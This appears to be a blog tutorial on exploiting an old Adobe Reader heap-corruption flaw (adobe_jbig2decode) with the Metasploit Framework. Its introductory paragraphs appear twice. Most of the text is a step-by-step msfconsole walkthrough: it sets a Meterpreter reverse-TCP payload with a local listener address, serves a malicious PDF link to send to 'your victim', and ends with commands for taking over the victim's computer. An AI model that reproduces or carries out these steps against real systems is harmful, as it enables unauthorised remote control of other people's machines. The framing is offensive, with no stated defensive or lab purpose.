What is Metasploit?
The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development.
Its best-known sub-project is the open source[2] Metasploit Framework, a tool for developing and executing exploit code against a remote target machine. Other important sub-projects include the Opcode Database, shellcode archive and related research.
The Metasploit Project is well known for its anti-forensic and evasion tools, some of which are built into the Metasploit Framework.
Adobe_jbig2decode Exploit:
This module exploits a heap-based pointer corruption flaw in Adobe Reader 9.0.0 and earlier. This module relies upon JavaScript for the heap spray.
Exploit Targets:
You Now have access to the victims Computer. Use “sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“
The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development.
Its best-known sub-project is the open source[2] Metasploit Framework, a tool for developing and executing exploit code against a remote target machine. Other important sub-projects include the Opcode Database, shellcode archive and related research.
The Metasploit Project is well known for its anti-forensic and evasion tools, some of which are built into the Metasploit Framework.
Adobe_jbig2decode Exploit:
This module exploits a heap-based pointer corruption flaw in Adobe Reader 9.0.0 and earlier. This module relies upon JavaScript for the heap spray.
Exploit Targets:
- Adobe Reader v9.0.0 (Windows XP SP3 English) (default)
- Adobe Reader v8.1.2 (Windows XP SP2 English)
- Attacker: Metasploit
- Victim PC: Windows XP
- Open terminal
- Type msfconsole
- Use exploit/windows/browser/adobe_jbig2decode
- Msf exploit(adobe_jbig2decode)>set payload windows/meterpreter/reverse_tcp
- Msf exploit (adobe_jbig2decode)>set lhost 192.168.1.4 (IP of Local Host)
- Msf exploit (adobe_jbig2decode)>set srvhost 192.168.1.4 (This must be an address on the local machine)
- Msf exploit (adobe_jbig2decode)>set uripath akonsong (The Url to use for this exploit)
- Msf exploit (adobe_jbig2decode)>exploit
- Now a URL you should give to your victim http://192.168.1.4:8080/akonsong
- When the victim opens that link in their browser, immediately it will alert a dialog box about akonsong PDF .
You Now have access to the victims Computer. Use “sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“
Sign up here with your email
ConversionConversion EmoticonEmoticon